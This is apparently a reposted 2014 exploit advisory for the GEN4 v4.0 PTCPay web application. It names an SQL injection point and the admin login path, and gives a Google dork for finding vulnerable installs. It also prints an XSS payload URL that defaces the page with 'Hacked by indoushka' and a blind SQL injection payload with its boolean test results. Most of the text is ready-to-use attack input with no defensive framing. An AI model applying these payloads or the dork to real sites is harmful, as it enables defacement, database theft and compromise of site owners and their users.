facebook facebook twitter rss

GEN4 v4.0 PTCPay Multi Vulnerability

Author: indoushka , Published: 25-10-2014
GEN4 v4.0 PTCPay Multi Vulnerability
====================================
Author : indoushka
Vondor : http://www.p30vel.ir/
Dork : GeN4 © 2009
======================================

Sql inj :

http://127.0.0.1/GEN/forum/main_forum.php?cat=1 (inject her)

login : http://127.0.0.1/GEN/admin/

( XSS / HTML Inject ) :

http://127.0.0.1/GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1

Blind SQL Injection :

This vulnerability affects /GEN/forum/main_forum.php.

Attack details
URL encoded GET input cat was set to 1/**/AND/**/307=307

Tests performed:
0+0+0+1 => TRUE
0+307*302+1 => FALSE
11-5-2-999 => FALSE
11-5-2-3 => TRUE
11-2*5+0+0+1-1 => TRUE
11-2*6+0+0+1-1 => FALSE
1 AND 2+1-1-1=1 AND 307=307 => TRUE
1 AND 3+1-1-1=1 AND 307=307 => FALSE
1 AND 3*2<5 AND 307=307 => FALSE
1 AND 3*2>5 AND 307=307 => TRUE
1/**/AND/**/0=1/**/AND/**/307=307 => FALSE
1/**/AND/**/307=307 => TRUE

Original value: 1

Like us on Facebook :